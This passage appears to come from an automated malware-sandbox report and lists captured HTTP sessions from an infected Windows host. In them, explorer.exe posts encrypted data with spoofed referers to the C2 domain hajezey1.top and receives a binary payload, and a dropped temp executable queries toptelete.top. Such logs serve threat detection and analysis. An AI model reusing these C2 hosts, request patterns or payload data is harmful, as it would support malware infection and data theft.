was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.4	49854	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:18.905951023 CEST	8554	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tdbyxcrg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 364 Host: hajezey1.top
Oct 29, 2021 20:50:18.907654047 CEST	8554	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de bf 66 5d 02 c8 a1 c1 64 1e d2 b5 6c Data Ascii: 6152Ek\lwmwu$f]dlQM3{6RJP/r\TPp$sP,CGq3NQfS5/.OfsuaRWiF^SA3Q\|;N{[S2ip}+q,$~7zJ_I
Oct 29, 2021 20:50:18.987524986 CEST	8555	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49764	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:30.006201982 CEST	1076	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jaqhuuufk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 250 Host: hajezey1.top
Oct 29, 2021 20:49:30.006206989 CEST	1076	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 13 b3 9e 02 Data Ascii: 6152Ek\lwmwu$f]dGfiov$@kPrRc!IU_#`f2&/%}J6Ao&a+-vzw:Swn%WH3?s!qT"($khrWA[J
Oct 29, 2021 20:49:30.085879087 CEST	1076	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:30 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1e b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.4	49855	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:19.081646919 CEST	8556	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hmoapn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 207 Host: hajezey1.top
Oct 29, 2021 20:50:19.081665039 CEST	8556	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de bc 66 5d 02 c8 a1 c1 64 0d c1 c2 2b Data Ascii: 6152Ek\lwmwu$f]d+MLDy(vUqeMiIUyWqAD3!}^ &VOwV/T}uP"=yN[qr1$i^zCQ
Oct 29, 2021 20:50:19.163575888 CEST	8558	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c a5 c7 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 a9 85 87 cd 31 81 78 51 a1 a2 8f 00 8e c2 1c e0 32 02 50 08 88 c5 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 01 9c 20 59 55 11 5c 7c 3b 66 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 99 79 d6 8a 5c d8 06 0e 45 07 0e 7d cf f3 e1 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 92 cc 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 ff 64 45 96 da 19 d1 3a 2d e4 5e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 d1 8f 4b 04 38 ad 62 14 2c c6 e9 b1 14 37 6c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 62 5f 64 cd 25 5c 8d b7 f7 3d 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 91 81 a8 be 34 56 9b 46 76 99 86 11 00 83 32 42 ca 43 ce ae 80 3a 95 36 e1 48 50 67 b6 50 b8 81 0e 76 81 de 33 fb 76 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 f1 b5 60 4a 3a 7d 54 7a 99 6c 39 d1 5e f3 5f 76 4e 63 95 b4 0d 16 cb 9c 51 24 22 7d ec b9 68 62 be 7f 13 eb cd f6 25 15 88 d8 95 7f 8e 4a 9b 16 66 45 a7 0d 7c 8e 24 38 69 81 7d af 01 ec 83 41 66 20 ae b8 ea 21 19 a0 4a 48 61 8c bd 77 6a 67 17 0d f1 ee 22 3b 6f ab e5 84 79 f3 53 d3 e4 9a 24 59 d4 55 23 2c 0f 70 d7 b1 56 09 d6 89 bc 08 81 dd ad 80 41 ca 2a 85 d8 de 3e 67 a0 f5 ba 08 c0 fa 5d e4 1f 28 68 bc fa a5 ed 82 ac 11 40 31 02 1a 1f c1 e0 f7 6f f0 e7 17 d3 87 45 d0 ef 44 e9 cf 81 6c 59 20 9b e9 db f0 c3 05 d4 99 cd 21 42 47 c4 a5 cc 49 55 c8 08 f2 bb d9 39 6f 8b 87 9a 0c ef 0f 4e 88 f0 24 bf 34 fa 8b b4 26 bc 06 46 b0 0c 64 08 d8 fd f8 c9 4a 26 1b 3c 2d 6f 73 74 87 35 60 a0 99 ff 6d 37 d3 ad a1 84 0b 84 f3 9e 98 bb 1f 65 c7 26 f0 3b ee a2 8e f0 03 af 63 96 1d f7 a9 15 15 1c 70 40 cd c9 e1 dd b0 c0 0f 25 99 59 c6 1e aa c6 8e 34 3d f6 46 64 68 de be 9c 98 3f d8 2f eb 53 52 a0 0e 94 97 04 76 f9 1e f3 20 64 84 b9 64 4f 55 a7 fa 5b c3 96 c0 88 0b 39 d9 1d 78 09 dd 90 1a c1 03 7a 06 16 f4 d4 6c d1 79 04 da 07 20 95 e0 ac cf 35 f8 37 8b a6 cc b5 27 51 77 57 09 15 3d d8 b5 d3 ea 4d d8 97 25 ed af fe 52 f1 ff 54 8f 8e 8b 11 19 ca 0f 48 ad 06 5a 8b 37 b7 31 f1 64 60 b2 f7 51 dd 3b c5 da 82 f1 7d 96 70 f1 36 6b 48 11 00 aa 82 14 02 a1 8c 22 cf f0 98 3b 41 a6 d1 b7 37 ce 84 c3 ce 85 97 3a 94 c5 54 e6 2c 4a bb 22 27 c0 a9 0b a4 8f 1b c5 8f 1a a8 88 d5 bc 4c 35 b7 8e e8 22 94 9b e1 d1 9a f2 38 1f 92 84 01 b3 61 02 a3 89 08 e4 3f 6f 03 66 3c 98 f8 80 93 8b 86 fb 76 1d b8 7c af 9a a7 a4 da 9d 46 e0 87 40 44 4d 76 06 fb 0c 97 8e 0d e8 9a 4c 78 30 8d 42 12 11 16 a0 81 b0 58 43 56 a2 eb ca 54 02 f3 82 66 34 b1 e3 ec a1 fb 68 98 31 6d fb b5 0e 8f f5 35 5e 14 53 7f 96 ff f0 85 af 6b 3b Data Ascii: 1f66S(SW\/iP"&&grq\|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8\|F+%gt1xQ2P0YObyT=a'4 YU\\|;fIXKg[Ge92)g z6y\E}WpJk"HI?o\|6NI[LeU[0z;+W~5=PVpGZlqV@q!UvydE:-^%GkKm@NQ>[K8b,7l"JG0Z"?kQTJMQb_d%\=&Q#F<pvA>C/CbGB4VFv2BC:6HPgPv3v6'NGc_,/DO9W%`J:}Tzl9^_vNcQ$"}hb%JfE\|$8i}Af !JHawjg";oyS$YU#,pVA*>g](h@1oEDlY !BGIU9oN$4&FdJ&<-ost5`m7e&;cp@%Y4=Fdh?/SRv ddOU[9xzly 57'QwW=M%RTHZ71d`Q;}p6kH";A7:T,J"'L5"8a?of<v\|F@DMvLx0BXCVTf4h1m5^Sk;
Oct 29, 2021 20:50:19.163609982 CEST	8559	IN	Data Raw: 65 6e fa 93 4e ce 61 dd 5e c5 48 45 78 08 52 c9 03 f0 f3 bc fa b3 bf 38 09 bf c4 88 05 44 65 8a 40 82 70 8d 4e 2e 8c 84 05 86 e8 12 86 65 7b 37 c0 5a 27 dd a7 3c 09 1b 2f 70 d9 6b df c8 bc fb 71 5d 01 45 65 e9 92 91 54 5a 70 3b 8b 38 7a e0 2d 55 Data Ascii: enNa^HExR8De@pN.e{7Z'</pkq]EeTZp;8z-U&&fG2S2!@j*'ON:G$IZW\YiNP}6l>L5Fb{S3aD.)^t2!/W\|;B'&mW>>B\|S0%)
Oct 29, 2021 20:50:19.163639069 CEST	8560	IN	Data Raw: 7f 72 b1 81 37 d4 68 84 bd 8c 8c cb 9e 39 fc da fc 8f 6d cd 57 7b df 3e 95 69 17 7c d6 b7 a2 a0 6e a8 1c 85 53 58 76 22 27 c9 f9 d8 99 5c 54 b8 ad 78 65 c8 68 fa 09 25 f7 ec 5a c4 b6 ae b4 77 97 62 c1 2a 73 ac a6 dc 97 aa ba 1f b6 6c 85 ad bc 98 Data Ascii: r7h9mW{>i\|nSXv"'\Txeh%Zwb*sl/]q$B4u~[EP^iC4SNY-j+9@}GJCAuTAZtsR_zTa^2\|_@B+7+_{S"
Oct 29, 2021 20:50:19.163660049 CEST	8562	IN	Data Raw: 83 d1 ef 3c 8a 86 00 37 41 99 80 82 3d 9b ea 8d 3f f2 1e 43 e0 f4 52 4b 4e ef 6e ce a3 ad c5 e4 df 10 96 90 b5 fc 38 1d c7 b4 9f 9c 67 6e 81 90 6c 20 09 ec a0 a6 56 19 d8 1c b1 6a d5 3a f9 d9 f3 82 64 6f 4d 12 1d 0c 87 dd 8e 03 a7 b4 cd 8b 02 45 Data Ascii: <7A=?CRKNn8gnl Vj:doMEJiMwQ8&Klf0N~ALz/!;{.n/;l{K+VPM&jWX+:!\|7bNcYHJYbr$-sePN ,lUM
Oct 29, 2021 20:50:19.163683891 CEST	8563	IN	Data Raw: 8b 09 2e 73 46 64 73 31 0e 2f da 6f 9f 77 4d 19 dd af 53 ee d1 01 a5 f7 ca 78 71 78 c3 87 0a 3c 89 b5 b9 38 c1 43 81 d6 dc d9 d3 d0 65 43 42 e4 cc e2 00 68 31 d0 50 d9 79 ef 14 44 d8 16 a9 16 6f b2 dd 0d 6b 55 03 7d 87 52 5a 0e c9 3c 85 ec 72 92 Data Ascii: .sFds1/owMSxqx<8CeCBh1PyDokU}RZ<rd+Ud+5`\|P"nkQ`dyZzim2VQ$P&yr'_q;s]+4oxC_W5&9tJ? &EgA<GPw##S{"ixd&yU;8w
Oct 29, 2021 20:50:19.163711071 CEST	8565	IN	Data Raw: 80 27 e7 27 91 91 e1 64 4f c6 f4 20 ff 0d d2 45 5c be 3c fa ee c4 a6 a1 b0 2a ae 5d dc 6a c2 ed 54 f9 3e 2b 64 5a 67 f2 22 0f 4a dc 3b c8 85 06 dc e5 3a 49 2c 84 53 d3 5b 5c 8c 3c 00 c9 8b 88 56 70 cf 09 db d3 a3 0c 58 e4 f5 6b 18 29 c5 fd 09 6e Data Ascii: ''dO E\<*]jT>+dZg"J;:I,S[\<VpXk)nWz!K>M,5IQ9Mx\!tj1y{,!4S$^>;OpUSwxgl,]i \bCyin8:~b:+Gmk^Y#`xE?Laqs
Oct 29, 2021 20:50:19.163733006 CEST	8566	IN	Data Raw: 57 a7 92 a0 b1 4c 39 e8 51 1b db fb 8d e7 97 a5 b7 c7 8a ed d3 a7 1e eb 29 37 32 7a 57 f7 11 7f f5 23 cd 00 a6 dc 13 1e 7e 4c c5 31 7a cd 7e 51 b2 f0 11 ab ce 7b a7 28 36 37 53 f7 e0 c5 4e 19 de 7b c4 0c ce bd 4d 8c 09 5c 65 7d 74 31 6c d3 96 1d Data Ascii: WL9Q)72zW#~L1z~Q{(67SN{M\e}t1lgSF2CRicrn.9YHJGI09>2qCg<Z!\|WggSY]^BX$@B{vTi92000bvUk7jEU&g64&>/nUhHC)LUf'
Oct 29, 2021 20:50:19.163758039 CEST	8567	IN	Data Raw: 90 e1 0d e8 7f 3e c3 2b 7b a6 b0 38 1e b8 ab 81 b3 86 56 4a 23 52 1d 63 0c 04 8f fa 24 0f a4 61 71 d1 c3 a8 f3 03 d9 ee 3b d8 54 c5 81 a0 e7 54 bb 69 16 2f 3f d5 7f 14 97 a7 52 38 01 c0 ed 84 7b 62 e4 ed 5a d9 54 b0 75 69 0c ae da 34 c7 c5 68 cc Data Ascii: >+{8VJ#Rc$aq;TTi/?R8{bZTui4h}-$pH=@.\zj-,rFXLe\|)BtR}}!/FTpc$4.v+{big$bNvn?:0%+)wq=W'/we3dD
Oct 29, 2021 20:50:19.163781881 CEST	8569	IN	Data Raw: 58 b1 b3 a6 3f 38 f6 00 01 15 24 02 8e f3 48 b3 7f 32 e1 c8 b5 de 3b 20 50 75 30 d6 bc c9 ba 4a ff 24 c1 13 92 d5 51 af 59 75 d7 cf 2b 52 ec 3a fd 29 08 10 3e 85 37 d2 a5 1e 0b 13 ba 24 d1 e7 04 b7 4f 2e 5b 7a 39 f6 de d6 09 04 10 f0 28 b2 6a 7b Data Ascii: X?8$H2; Pu0J$QYu+R:)>7$O.[z9(j{xHu&q#a4vqM9(4f=t>DtmR2 VG_9?7yVCQ3[8R4RSl;HJ`R=rOT<F5&*j
Oct 29, 2021 20:50:19.163805962 CEST	8570	IN	Data Raw: 31 f8 af fb 37 92 e8 da 81 b9 4c 6a c0 51 d4 f4 30 2d ae 28 11 6d 27 c7 fc c1 ae ac 02 fc d4 35 4b ac 22 dd 86 9c 24 10 d6 55 71 09 88 65 12 55 2e e0 55 db 81 1b 0f 55 65 b7 21 2a 10 f2 df 5c e2 2c 39 7c e3 bd 14 63 08 ed c0 90 1d 66 2f be 88 3f Data Ascii: 17LjQ0-(m'5K"$UqeU.UUe!\,9\|cf/?JQu5B02_L."Y$-_SQ\retD@HrdE}oxLpW,Z$MyRZ$v Bf:?RaiF=AVi\&PjufNTbS<t\
Oct 29, 2021 20:50:19.215958118 CEST	8572	IN	Data Raw: 5f af 30 79 bb 59 a5 bd df 03 c6 22 fa 8a cd cd fc 8c 1e 7f 54 f3 13 73 fc 41 aa fd be a0 28 57 a0 33 63 cb d0 ea 9d 42 fc 13 c7 70 a6 54 f7 d6 6a dd b1 46 6a 89 38 df c9 75 4a d4 51 fc 82 8e 54 4f 69 3c b0 61 e4 c9 9c f7 7b 11 73 8f e7 8d 63 b6 Data Ascii: _0yY"TsA(W3cBpTjFj8uJQTOi<a{scY0JyeBp6q.&<DzqFXMmfRASrE0U!7[k.-:Oz!^"];%7Ns#4Is0_;$Q!rPoi

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.4	49857	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:23.203958035 CEST	10976	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sefui.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 228 Host: hajezey1.top
Oct 29, 2021 20:50:23.206789970 CEST	10976	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de bc 66 5d 02 c9 a1 c1 64 4a c0 89 06 Data Ascii: 6152Ek\lwmwu$f]dJI~&9Ma'iP*EstRSh6xUyVVn!6t"v;f\XbK/XyoW1Vea_Y[gm#-f]5a3.Q_Tz( U
Oct 29, 2021 20:50:23.283454895 CEST	10977	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.4	49858	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:23.676845074 CEST	10978	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rjpartffs.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 260 Host: hajezey1.top
Oct 29, 2021 20:50:23.676899910 CEST	10978	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de bd 66 5d 02 c8 a1 c1 64 0e df b4 2f Data Ascii: 6152Ek\lwmwu$f]d/WlbAQVFB3&KC@>\|IW$+8^}=PBrIn:Z`N`bF!+ffuFSii9_*cW6t2W!(
Oct 29, 2021 20:50:23.755883932 CEST	10979	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.4	49864	172.67.160.46	80	C:\Users\user\AppData\Local\Temp\5483.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:39.549134016 CEST	16053	OUT	GET /agrybirdsgamerept HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: toptelete.top
Oct 29, 2021 20:50:39.733943939 CEST	16055	IN	HTTP/1.1 200 OK Date: Fri, 29 Oct 2021 18:50:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive set-cookie: stel_ssid=61a48ca32b6302afe6_14593543805639631597; expires=Sat, 30 Oct 2021 18:50:39 GMT; path=/; samesite=None; secure; HttpOnly pragma: no-cache cache-control: no-store strict-transport-security: max-age=35768000 access-control-allow-origin: * CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IJfwgNrFF%2Fwpl1K8Yr1W74O1xFj6Ddgru%2FHmA1TCqtkgO9M4xv23BEa%2Fpoj7u2wNToXFMWuG0dy3E7udjDwON7K2qkPiGKUm3M4edZPeGQJ1WbB06RwYbHjaczcsqCCn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a5e973d3ac26997-FRA Data Raw: 31 31 66 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 